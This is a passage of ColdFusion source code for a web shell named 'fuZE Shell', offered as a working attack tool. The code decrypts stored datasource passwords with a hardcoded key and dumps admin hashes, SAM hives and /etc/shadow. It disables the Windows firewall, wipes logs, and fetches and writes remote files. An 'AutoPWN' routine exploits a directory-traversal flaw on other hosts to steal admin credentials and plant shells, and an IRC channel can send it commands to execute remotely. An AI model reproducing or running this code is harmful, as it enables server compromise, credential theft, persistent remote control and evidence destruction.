  449. if(len(o[i]["password"])){
  450. dp=Decrypt(o[i]["password"], generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64") ;
  451. writeoutput("#htmleditformat(i)# : #htmleditformat(dp)##chr(10)#");
  452. }
  453. }
  454. </cfscript>
  455. </cfcase>
  456. <cfcase value="Dump CF hashes"><cffile action="READ" file="#Server.ColdFusion.RootDir#\lib\password.properties" variable="cfhashes">#htmleditformat(cfhashes)#</cfcase>
  457. <cfcase value="Restart JRUN server (CF)">
  458. <cfscript>
  459. oJRun = CreateObject("java","jrunx.kernel.JRun");
  460. oJRun.restart(oJRun.getServerName());
  461. </cfscript>
  462. </cfcase>
  463. <cfcase value="Wipe ColdFusion logs">
  464. <cfset sf = CreateObject("java", "coldfusion.server.ServiceFactory")>
  465. <cfset logDir = sf.LoggingService.getLogDirectory()>
  466. <cfif server.os.name neq "UNIX">
  467. <cfset osSlash = "\">
  468. <cfelse>
  469. <cfset osSlash = "/">
  470. </cfif>
  471. <cfdirectory action="list" directory="#logDir#" name="logs" filter="*.log">
  472. <cfloop query="logs">
  473. <cffile action="write" file="#logDir##osSlash##logs.Name#" output="## Purged" addnewline="yes">
  474. </cfloop>
  475. </cfcase>
  476. <!--- Windows functions --->
  477. <cfcase value="Disable Windows firewall"><cfexecute name="cmd.exe" arguments="/c netsh firewall set opmode disable" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  478. <cfcase value="Enable Telnet service"><cfexecute name="cmd.exe" arguments="/c sc config tlntsvr start= demand & net start telnet" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  479. <cfcase value="Show opened ports [W]"><cfexecute name="cmd.exe" arguments="/c netstat -aon" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  480. <cfcase value="Read SAM"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SAM" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  481. <cfcase value="Read SECURITY"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SECURITY" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  482. <cfcase value="Read SYSTEM"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SYSTEM" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  483. <cfcase value="Read IIS paths">Path : Domain : LogFileDirectory
  484. <cftry>
  485. <cfset xmlPath=arrayNew(1)>
  486. <cfset xmllocation=arraynew(1)>
  487. <cfset xmlServerindings=arraynew(1)>
  488. <cfset xmlLogFileDirectory=arraynew(1)>
  489. <cfset Xmlbasepath="C:\WINDOWS\system32\inetsrv\MetaBase.xml">
  490. <cftry>
  491. <cffile action="read" file="#Xmlbasepath#" variable="XMLFileText">
  492. <cfcatch type="any">
  493. <cfoutput>Error reading MetaBase.xml: #cfcatch.type#</cfoutput>
  494. <cfreturn xmlpath>
  495. </cfcatch></cftry>
  496. <cfset myXMLDocument=XmlParse(XMLFileText)>
  497. <cfset numItems = ArrayLen(myXMLDocument.configuration.MBProperty.IIsWebServer)>
  498. <cfloop index="i" from = "1" to = #numItems#>
  499. <cfif findnocase("ServerBindings=",#myXMLDocument.configuration.MBProperty.IIsWebServer[i]#)>
  500. <cfset ServerBindings = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.ServerBindings#>
  501. <cfset location = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.location#>
  502. <cfset arrayAppend(xmllocation,("#location#"))>
  503. <cfset arrayAppend(xmlServerindings,("#ServerBindings#"))>
  504. <cfif findnocase("LogFileDirectory=",#myXMLDocument.configuration.MBProperty.IIsWebServer[i]#)>
  505. <cfset LogFileDirectory = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.LogFileDirectory#>
  506. <cfset arrayAppend(xmlLogFileDirectory,("#LogFileDirectory#"))>
  507. <cfelse>
  508. <cfset arrayAppend(xmlLogFileDirectory,(""))>
  509. </cfif></cfif></cfloop>
  510. <cfset numLocations=arraylen(xmllocation)>
  511. <cfset numItems = ArrayLen(myXMLDocument.configuration.MBProperty.IIsWebVirtualDir)>
  512. <cfloop index="i" from = "1" to = #numItems#>
  513. <cfif findnocase("path",#myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i]#) >
  514. <cfset path1 = #myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i].XmlAttributes.path#>
  515. <cfif findnocase("Program Files",#path1#) is 0 and findnocase("WINDOWS",#path1#) is 0>
  516. <cfset listpath=arraytolist(xmlpath)>
  517. <cfif find(#path1#,#listpath#) is 0>
  518. <cfset arrayAppend(xmlpath,"#path1#")>
  519. <cfloop index="j" from = "1" to = #numLocations#>
  520. <cfif findnocase(#xmllocation[j]#,#myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i].XmlAttributes.Location#) is not 0>
  521. <cfoutput>"#path1#" : "#xmlServerindings[j]#" : "#xmlLogFileDirectory[j]#"#chr(10)#</cfoutput>
  522. </cfif></cfloop></cfif></cfif></cfif></cfloop>
  523. <cfcatch>Error
  524. </cfcatch>
  525. </cftry>
  526. </cfcase>
  527. <cfcase value="View open sessions [W]"><cfexecute name="cmd.exe" arguments="/c query session" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  528. <cfcase value="View local shares"><cfexecute name="cmd.exe" arguments="/c net share" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  529. <cfcase value="View domain shares"><cfexecute name="cmd.exe" arguments="/c net view" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  530. <cfcase value="View users"><cfexecute name="cmd.exe" arguments="/c net user" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  531. <cfcase value="View running processes [W]"><cfexecute name="cmd.exe" arguments="/c tasklist" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  532. <cfcase value="View system info [W]"><cfexecute name="cmd.exe" arguments="/c systeminfo" timeout="30" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  533. <cfcase value="Check disk for consistency"><cfexecute name="cmd.exe" arguments="/c chkdsk" timeout="180" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase> <!--- Shout outs to fractal! --->
  534. <!--- Linux functions --->
  535. <cfcase value="Find SUID files"><cfexecute name="sh" arguments="-c 'find / -type f -perm -04000 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  536. <cfcase value="Find SGID files"><cfexecute name="sh" arguments="-c 'find / -type f -perm -02000 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  537. <cfcase value="Find all *conf* files"><cfexecute name="sh" arguments="-c 'find / -type f -name *conf*'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  538. <cfcase value="Find all .*_history files"><cfexecute name="sh" arguments="-c 'find / -type f -name .*_history'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  539. <cfcase value="Find all *.pwd files"><cfexecute name="sh" arguments="-c 'find / -type f -name *.pwd'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  540. <cfcase value="Find all .*rc files"><cfexecute name="sh" arguments="-c 'find / -type f -name .*rc'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  541. <cfcase value="Find all writable directories and files"><cfexecute name="sh" arguments="-c 'find / -perm -2 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  542. <cfcase value="Find all writable directories and files in current dir"><cfexecute name="sh" arguments="-c 'find . -perm -2 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  543. <cfcase value="Read /etc/passwd"><cfexecute name="sh" arguments="-c 'cat /etc/passwd'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  544. <cfcase value="Read /etc/shadow"><cfexecute name="sh" arguments="-c 'cat /etc/shadow'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  545. <cfcase value="Read /proc/self/environ"><cfexecute name="sh" arguments="-c 'cat /proc/self/environ'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  546. <cfcase value="Show opened ports [L]"><cfexecute name="sh" arguments="-c 'netstat -a'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  547. <cfcase value="View open sessions [L]"><cfexecute name="sh" arguments="-c 'w'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  548. <cfcase value="View recent sessions"><cfexecute name="sh" arguments="-c 'last'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  549. <cfcase value="View running processes [L]"><cfexecute name="sh" arguments="-c 'ps auxww'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  550. <cfcase value="View memory info"><cfexecute name="sh" arguments="-c 'df -h;free -m'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  551. <cfcase value="View CPU info"><cfexecute name="sh" arguments="-c 'cat /proc/cpuinfo'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  552. <cfcase value="View system info [L]"><cfexecute name="sh" arguments="-c 'uname -a'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  553. <cfdefaultcase>Invalid function</cfdefaultcase>
  554. </cfswitch>
  555. <cfcatch>Error
  556. </cfcatch>
  557. </cftry>
  558. </textarea>
  559. <cfelseif isDefined("Form.decrypt_hash")>
  560. <pre>Decrypting '#htmleditformat(Form.decrypt_hash)#'</pre>
  561. <textarea class="report" rows="20">
  562. <cftry>
  563. <cfscript>
  564. dp=Decrypt(Form.decrypt_hash, generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64");
  565. writeoutput(dp);
  566. </cfscript>
  567. <cfcatch>Invalid hash
  568. </cfcatch>
  569. </cftry>
  570. </textarea>
  571. <cfelseif isDefined("Form.Upload") and Form.Upload EQ "Upload">
  572. <pre>Uploading file to '#htmleditformat(getDirectoryFromPath(getCurrentTemplatePath()))#'</pre>
  573. <textarea class="report" rows="20">
  574. <cftry>
  575. <cffile action="upload" destination="#getDirectoryFromPath(getCurrentTemplatePath())#" filefield="Form.File" nameconflict="overwrite">File uploaded!
  576. <cfcatch>Upload failed
  577. </cfcatch>
  578. </cftry>
  579. </textarea>
  580. <cfelseif isdefined("Form.Download")>
  581. <cftry>
  582. <cfsilent>
  583. <cfheader name="Content-Disposition" value="attachment; filename=#getFileFromPath(Form.Download)#">
  584. <cfcontent type="application/unknown" file="#Form.Download#">
  585. </cfsilent>
  586. <cfcatch>File is not available
  587. <cfabort>
  588. </cfcatch>
  589. </cftry>
  590. <cfelseif isDefined("Form.RUpload")>
  591. <pre>Uploading file from '#htmleditformat(Form.RUpload)#'</pre>
  592. <textarea class="report" rows="20">
  593. <cftry>
  594. <cfhttp url="#Form.RUpload#" method="get" getasbinary="yes" result="rFile" />
  595. <cffile action="write" file="#getDirectoryFromPath(getCurrentTemplatePath())##listLast(Form.RUpload,"\/")#" addNewLine="no" output="#rFile.filecontent#" />
  596. <cfoutput>File saved to #htmleditformat(getDirectoryFromPath(getCurrentTemplatePath()))##htmleditformat(listLast(Form.RUpload,"\/"))#</cfoutput>
  597. <cfcatch>Error</cfcatch>
  598. </cftry>
  599. </textarea>
  600. <cfelseif isDefined("Form.exec_sql")>
  601. <pre><cfoutput>Executing '#htmleditformat(Form.exec_sql)#' in datasource '#htmleditformat(Form.datasource)#'</cfoutput></pre>
  602. <cfquery name="sqlout" datasource="#Form.datasource#" username="#Form.db_username#" password="#Form.db_password#">
  603. #Form.exec_sql#
  604. </cfquery>
  605. <cfdump var="#sqlout#" expand="false">
  606. <cfelseif isDefined("Form.cfscan")>
  607. <pre>Scanning for CF instances over the LAN</pre>
  608. <textarea class="report" rows="20">
  609. <cftry>
  610. <cfset sf = CreateObject("java", "coldfusion.server.ServiceFactory")>
  611. <cfset lic=#sf.LicenseService.runScan()#>
  612. <cfloop collection="#lic#" item="i">
  613. <cfoutput>ColdFusion #lic[i][1]['Edition']# build #lic[i][1]['Build']# at #lic[i][1]['MachineName']# (#lic[i][1]['IpAddrs']#)#chr(10)#</cfoutput>
  614. </cfloop>
  615. <cfcatch>Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></cfcatch>
  616. </cftry>
  617. </textarea>
  618. <cfelseif isDefined("Form.regpath")>
  619. <cftry>
  620. <cfif form.regpath is not "">
  621. <cfif form.entry is "">
  622. <CFREGISTRY Action="getAll"
  623. Branch="#form.regpath#"
  624. Type="Any"
  625. Name="RegQuery">
  626. <CFTABLE Query="RegQuery" colHeaders HTMLTable Border="Yes">
  627. <CFCOL Header="<B>Entry</b>" Width="35" Text="#RegQuery.Entry#">
  628. <CFCOL Header="<B>Type</b>" Width="10" Text="#RegQuery.type#">
  629. <CFCOL Header="<B>Value</b>" Width="35" Text="#RegQuery.Value#">
  630. </CFTABLE>
  631. <cfelse>
  632. <cfif form.newentry is "">
  633. <CFPARAM NAME="RegValue" DEFAULT="not found">
  634. <CFREGISTRY Action = "get" Branch = "#form.regpath#" Entry = "#form.Entry#" Type="#form.regtype#" variable = "RegValue">
  635. <cfoutput>(#form.regpath#\#form.Entry# ) values is : #RegValue#</cfoutput>
  636. <cfelse>
  637. <CFPARAM NAME="RegValue" DEFAULT="not found">
  638. <CFREGISTRY Action = "get" Branch = "#form.regpath#" Entry = "#form.Entry#" Variable = "RegValue" Type = "#form.regtype#">
  639. <cfoutput>(#form.regpath#\#form.Entry# ) old values is : #RegValue#<br /></cfoutput>
  640. <cfif regvalue is not "not found">
  641. <CFREGISTRY Action="set" Branch="#form.regpath#" Entry="#form.Entry#" Type="#form.regtype#" Value="#form.newEntry#">
  642. <cfoutput>(#form.regpath#\#form.Entry# ) new values is : #form.newEntry#</cfoutput>
  643. </cfif>
  644. </cfif>
  645. </cfif>
  646. <cfelse>Error: A registry path must be defined
  647. </cfif>
  648. <cfcatch type="any"><cfoutput>Error: #cfcatch.type#</cfoutput></cfcatch>
  649. </cftry>
  650. <cfelseif isDefined("Form.target_host")>
  651. <pre>Attempting to AutoPWN [#htmleditformat(Form.target_host)#]</pre>
  652. <cftry>
  653. <cfset target_host=Form.target_host>
  654. <textarea class="report" rows="20">
  655. ====================================================================================================
  656. [~] AutoPWN report for [<cfoutput>#HTMLEditFormat(target_host)#</cfoutput>]
  657. <cfset lfi=[
  658. <!--- Single server configuration ColdFusion --->
  659. "..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties",
  660. <!--- ColdFusion 7 --->
  661. "..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties",
  662. <!--- ColdFusion 8 --->
  663. "..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties",
  664. <!--- ColdFusion 6, 7 AND 8 --->
  665. "..\..\..\..\..\..\..\..\..\..\JRUN4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"
  666. ]>
  667. <cfset lfi_success=FALSE>
  668. <cfloop array="#lfi#" index="i">
  669. <cfhttp url="http://#target_host#/CFIDE/administrator/logging/settings.cfm?locale=#i#%00en" result="lfiresult" method="get"></cfhttp>
  670. <cfset cfadmin_hash=REReplace(REReplace(REReplace(lfiresult.Filecontent,"(.*?)password=","","ALL"),"#chr(10)#encrypted(.*?)</html>","","ALL"),"\s","","ALL")>
  671. <cfif Len(cfadmin_hash) GT 0 AND Len(cfadmin_hash) LTE 40 AND cfadmin_hash NEQ "ConnectionFailure">
  672. <cfset lfi_success=TRUE>
  673. <cfbreak>
  674. </cfif>
  675. </cfloop>
  676. <cfif lfi_success EQ TRUE>[!] LFI succeeded, hash acquired: <cfoutput>#HTMLEditFormat(cfadmin_hash)#</cfoutput>
  677. <cfelse><cfthrow message="LFI failed">
  678. </cfif>
  679. <cfhttp url="http://#target_host#/CFIDE/administrator/enter.cfm" result="adminpage" method="get">
  680. <cfset cfadmin_salt=REReplace(Mid(adminpage.Filecontent,13,REFind("[0-9]{13}",adminpage.Filecontent)), "(.*?)salt"" type=""hidden"" value=""","","ALL")>
  681. <cfswitch expression="#Len(cfadmin_hash)#">
  682. <cfcase value="40">
  683. <cfset secretKeySpec=createObject("java","javax.crypto.spec.SecretKeySpec").init(toBinary(toBase64(cfadmin_salt)),"HmacSHA1")>
  684. <cfset mac=createObject("java","javax.crypto.Mac").getInstance("HmacSHA1")>
  685. <cfset mac.init(secretKeySpec)>
  686. <cfset encryptedBytes=mac.doFinal(toBinary(toBase64(cfadmin_hash)))>
  687. <cfset cfadmin_password=BinaryEncode(mac.doFinal(toBinary(toBase64(cfadmin_hash))),"Hex")>
  688. </cfcase>
  689. <cfdefaultcase>
  690. <!--- TODO: CF6 Auth --->
  691. <cfthrow message="CF6 authentication is unsupported">
  692. </cfdefaultcase>
  693. </cfswitch>
  694. [*] Logging in
  695. <cfset responsecookies=adminpage.Responseheader["Set-Cookie"]>
  696. <cfset cookiearray=ArrayNew(1)>
  697. <cfloop item="i" collection="#responsecookies#">
  698. <cfset cookiearray[i]=ListGetAt(responsecookies[i],1,";")>
  699. </cfloop>
  700. <cfhttp url="http://#target_host#/CFIDE/administrator/enter.cfm" result="adminlogin" method="post" redirect="false">
  701. <cfhttpparam type="header" name="Cookie" value="#ArraytoList(cookiearray,'; ')#">
  702. <cfhttpparam type="formfield" name="cfadminUserId" value="admin">
  703. <cfhttpparam type="formfield" name="cfadminPassword" value="#cfadmin_password#">
  704. <cfhttpparam type="formfield" name="salt" value="#cfadmin_salt#">
  705. </cfhttp>
  706. <cfset authorizationcookies=adminlogin.Responseheader["Set-Cookie"]>
  707. <cfset admincookiearray=ArrayNew(1)>
  708. <cfloop item="i" collection="#authorizationcookies#">
  709. <cfset admincookiearray[i]=ListGetAt(authorizationcookies[i],1,";")>
  710. </cfloop>
  711. <cfset authkey=admincookiearray[4]>
  712. <cfhttp url="http://#target_host#/CFIDE/administrator/reports/index.cfm" result="settingssummary" method="get">
  713. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  714. </cfhttp>
  715. <cfset runtime_user=REReplace(REReplace(REReplace(settingssummary.Filecontent,"(.*?)User Name(.*?)#chr(9)##chr(9)##chr(9)##chr(9)#","","ONE")," &nbsp;(.*?)</html>","","ONE"),"\s","","ALL")>
  716. <cfset cfide_path=REReplace(REReplace(REReplace(settingssummary.Filecontent,"(.*?)#chr(9)#/CFIDE (.*?)#chr(9)##chr(9)##chr(9)##chr(9)#","","ONE")," &nbsp;(.*?)</html>","","ONE"),"\s","","ALL")>
  717. <cfif REFind("/",cfide_path)><cfset slash="/">
  718. <cfelse><cfset slash="\">
  719. </cfif>[*] Creating payload objects
  720. <cfset shell_name=listFirst(listLast(getCurrentTemplatePath(),"\/"),".")>
  721. <cffile action="Copy" source="#getCurrentTemplatePath()#" destination="#getDirectoryFromPath(getCurrentTemplatePath())##shell_name#.txt">
  722. <cfset shell_url="http://#cgi.local_addr##reverse(listRest(reverse(CGI.SCRIPT_NAME),"/"))#/#shell_name#.txt">
  723. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduleedit.cfm" result="scheduletask" method="post">
  724. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  725. <cfhttpparam type="formfield" name="TaskName" value="CFSh">
  726. <cfhttpparam type="formfield" name="Start_Date" value="1/3/37">
  727. <cfhttpparam type="formfield" name="ScheduleType" value="Once">
  728. <cfhttpparam type="formfield" name="StartTimeOnce" value="12:00 AM">
  729. <cfhttpparam type="formfield" name="Interval" value="Daily">
  730. <cfhttpparam type="formfield" name="customInterval_hour" value="0">
  731. <cfhttpparam type="formfield" name="customInterval_min" value="0">
  732. <cfhttpparam type="formfield" name="customInterval_sec" value="0">
  733. <cfhttpparam type="formfield" name="Operation" value="HTTPRequest">
  734. <cfhttpparam type="formfield" name="ScheduledURL" value="#shell_url#">
  735. <cfhttpparam type="formfield" name="publish" value="1">
  736. <cfhttpparam type="formfield" name="publish_file" value="#cfide_path##slash##shell_name#.cfm">
  737. <cfhttpparam type="formfield" name="adminsubmit" value="Submit">
  738. <cfhttpparam type="formfield" name="taskNameOrig" value=""> <!--- CF8- --->
  739. </cfhttp>
  740. <cfhttp url="http://#target_host#/CFIDE/#shell_name#.cfm" result="shell_status" method="get">
  741. <cfif find("&fnof;uZE Shell",shell_status.Filecontent) is not 0>[!] &fnof;uZE copied successfully
  742. <cfelse>[!] Shell not found, recreating payload to subvert firewall
  743. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduleedit.cfm" result="scheduletask" method="post">
  744. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  745. <cfhttpparam type="formfield" name="TaskName" value="CFSh">
  746. <cfhttpparam type="formfield" name="Start_Date" value="1/3/37">
  747. <cfhttpparam type="formfield" name="ScheduleType" value="Once">
  748. <cfhttpparam type="formfield" name="StartTimeOnce" value="12:00 AM">
  749. <cfhttpparam type="formfield" name="Interval" value="Daily">
  750. <cfhttpparam type="formfield" name="customInterval_hour" value="0">
  751. <cfhttpparam type="formfield" name="customInterval_min" value="0">
  752. <cfhttpparam type="formfield" name="customInterval_sec" value="0">
  753. <cfhttpparam type="formfield" name="Operation" value="HTTPRequest">
  754. <cfhttpparam type="formfield" name="ScheduledURL" value="/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E">
  755. <cfhttpparam type="formfield" name="publish" value="1">
  756. <cfhttpparam type="formfield" name="publish_file" value="#cfide_path##slash#microshell.cfm">
  757. <cfhttpparam type="formfield" name="adminsubmit" value="Submit">
  758. <cfhttpparam type="formfield" name="taskNameOrig" value="CFSh"> <!--- CF8- --->
  759. </cfhttp>
  760. <cfhttp url="http://#target_host#/CFIDE/microshell.cfm" result="shell_status_2" method="get">
  761. <cfif find("&##181;SH",shell_status_2.Filecontent) is not 0>[!] Firewall subversion was successful
  762. <cfelse>[!] Shell not found
  763. </cfif>
  764. </cfif>[*] Removing payload objects
  765. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduletasks.cfm?action=delete&task=CFSh" result="deletetask" method="get">
  766. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  767. <cffile action="Delete" file="#getDirectoryFromPath(getCurrentTemplatePath())##shell_name#.txt">
  768. </cfhttp>[~] Results:
  769. [*] Server Status: <cfif find("&fnof;uZE Shell",shell_status.Filecontent) NEQ 0 OR find("&##181;SH",shell_status_2.Filecontent) NEQ 0>Compromised<cfelse>Uncompromised</cfif>
  770. [*] Access obtained: <cfoutput>#HTMLEditFormat(runtime_user)#</cfoutput>
  771. [*] Shell location: <cfif find("&fnof;uZE Shell",shell_status.Filecontent) NEQ 0><cfoutput>#HTMLEditFormat("http://#target_host#/CFIDE/#shell_name#.cfm")#</cfoutput><cfelseif find("&##181;SH",shell_status_2.Filecontent) NEQ 0><cfoutput>#HTMLEditFormat("http://#target_host#/CFIDE/microshell.cfm")#</cfoutput><cfelse>N/A</cfif>
  772. [~] EOF
  773. ====================================================================================================</textarea>
  774. <cfcatch>[!] Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif>
  775. [~] Results:
  776. [*] Server Status: N/A
  777. [*] Access obtained: N/A
  778. [*] Shell location: N/A
  779. [~] EOF
  780. ====================================================================================================</textarea>
  781. </cfcatch>
  782. </cftry>
  783. <cfelseif isDefined("Form.nuke")>
  784. <pre>Nuking shell</pre>
  785. <textarea class="report" rows="20">
  786. <cftry>
  787. <cffile action="delete" file="#getCurrentTemplatePath()#">
  788. Shell nuked
  789. <cfcatch>Error</cfcatch>
  790. </cftry>
  791. </textarea>
  792. <cfelseif isDefined("Form.ircip") and isDefined("Form.ircport")>
  793. <pre>Connecting to #htmleditformat(Form.ircip)#:#htmleditformat(Form.ircport)#</pre>
  794. <textarea class="report" rows="20">
  795. <cftry>
  796. <cfscript>
  797. try{
  798.  
  799. // Create socket
  800. socket=createObject("java","java.net.Socket");
  801.  
  802. // Connect to remote host
  803. socket.connect(createObject("java","java.net.InetSocketAddress").init(Form.ircip,Form.ircport));
  804. writeoutput("Remote port reached: #socket.isConnected()##chr(10)#");
  805.  
  806. // Establish connection
  807. try{
  808. instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(socket.getInputStream()));
  809. outstream=createObject("java","java.io.PrintWriter").init(socket.getOutputStream());
  810. writeoutput("Connection successful!#chr(10)#");
  811. } catch (IOException e) {
  812. writeoutput("IO Exception: Read failed#chr(10)#");
  813. }
  814.  
  815. // Communicate
  816. outstream.println("NICK #Form.ircnick#");
  817. outstream.println("USER #Form.ircuname# 8 * :#Form.ircrname#");
  818. outstream.flush();
  819. while(True){
  820. str = instream.readLine();
  821. cmd = str.split(" ");
  822.  
  823. //---------------------CLIENT----------------------//
  824. if (not cmd[1] EQ "PING"){
  825. if (cmd[2] EQ "433"){
  826. writeoutput("Nickname already in use: #Form.ircnick##chr(10)#");
  827. Form.ircnick="#Form.ircnick#_";
  828. outstream.println("NICK #Form.ircnick#");
  829. outstream.flush();
  830. }
  831. else if (cmd[2] EQ "004"){
  832. writeoutput("Entered IRC#chr(10)#");
  833. outstream.println("JOIN #Form.ircchan#");
  834. outstream.flush();
  835. }
  836. else if (FindNoCase(":>",str)){
  837. command_init=str.split(":>");
  838. command=command_init[2].split(" ");
  839. switch(command[1]){
  840. //---------------------//
  841. // Commands
  842. //---------------------//
  843. // Raw
  844. case "raw":
  845. {
  846. raw_init=str.split(":>raw ");
  847. raw=raw_init[2];
  848. outstream.println("#raw#");
  849. outstream.flush();
  850. break;
  851. }
  852. //---------------------//
  853. // Decrypt
  854. case "decrypt":
  855. {
  856. decrypt_init=str.split(":>decrypt ");
  857. decrypt_hash=decrypt_init[2];
  858. channel=cmd[3];
  859. outstream.println("PRIVMSG #channel# :Decrypting '#chr(15)##decrypt_hash##chr(15)#'");
  860. outstream.flush();
  861. dp=Decrypt(decrypt_hash, generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64");
  862. dp=replace(dp,chr(2),"\x02","ALL"); // Escape IRC bold character
  863. dp=replace(dp,chr(3),"\x03","ALL"); // Escape IRC color character
  864. dp=replace(dp,chr(7),"\x07","ALL"); // Escape IRC beep character
  865. dp=replace(dp,chr(10),"\x0A","ALL"); // Escape LF
  866. dp=replace(dp,chr(13),"\x0D","ALL"); // Escape CR
  867. dp=replace(dp,chr(15),"\x0f","ALL"); // Escape IRC no format character
  868. dp=replace(dp,chr(16),"\x16","ALL"); // Escape IRC reverse character
  869. dp=replace(dp,chr(31),"\x1f","ALL"); // Escape IRC underline character
  870. outstream.println("PRIVMSG #channel# :'#dp#'");
  871. outstream.flush();
  872. break;
  873. }
  874. //---------------------//
  875. // Execute
  876. case "exec":
  877. {
  878. exec_init=str.split(":>exec ");
  879. exec=exec_init[2].split(" ");
  880. channel=cmd[3];
  881. outstream.println("PRIVMSG #channel# :Executing '#chr(15)##exec_init[2]##chr(15)#'");
  882. outstream.flush();
  883. p = createObject("java","java.lang.ProcessBuilder").init(exec).start();
  884. i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
  885. br = createObject("java","java.io.BufferedReader").init(i);
  886. line=br.readLine();
  887. while (isDefined("line")) {
  888. outstream.println("PRIVMSG #channel# :> #line#");
  889. outstream.flush();
  890. line = br.readLine();
  891. }
  892. br.close();
  893. i.close();
  894. break;
  895. }
  896. //---------------------//
  897. // Help
  898. case "help":
  899. {
  900. channel=cmd[3];
  901. outstream.println("PRIVMSG #channel# :fuZE CF IRC Datapipe | Developed by XiX");
  902. outstream.println("PRIVMSG #channel# :Commands: >raw >decrypt >exec >help >exit");
  903. outstream.flush();
  904. break;
  905. }
  906. //---------------------//
  907. // Exit
  908. case "exit":
  909. {
  910. outstream.close();
  911. instream.close();
  912. socket.close();
  913. break;
  914. }
  915. //---------------------//
  916. // Invalid command
  917. default:
  918. {
  919. break;
  920. }
  921. //---------------------//
  922. }
  923. }
  924. }
  925. else {
  926. outstream.println("PONG #str.substring(5)#");
  927. outstream.flush();
  928. }
  929. //--------------------------------------------------//
  930.  
  931. }
  932.  
  933. }catch (Exception e) {
  934. writeoutput("Exception: Error#chr(10)#");
  935. }
  936. </cfscript>
  937. <cfcatch>Connection terminated</cfcatch>
  938. </cftry>
  939. </textarea>
  940. <cfelse>
  941. <pre>Waiting for input</pre>
  942. <textarea class="report" rows="20">Welcome to &fnof;uZE Shell</textarea>
  943. </cfif>
  944. </cfoutput></td><td width="25%">
  945. <div class="container">
  946. <div class="menu">
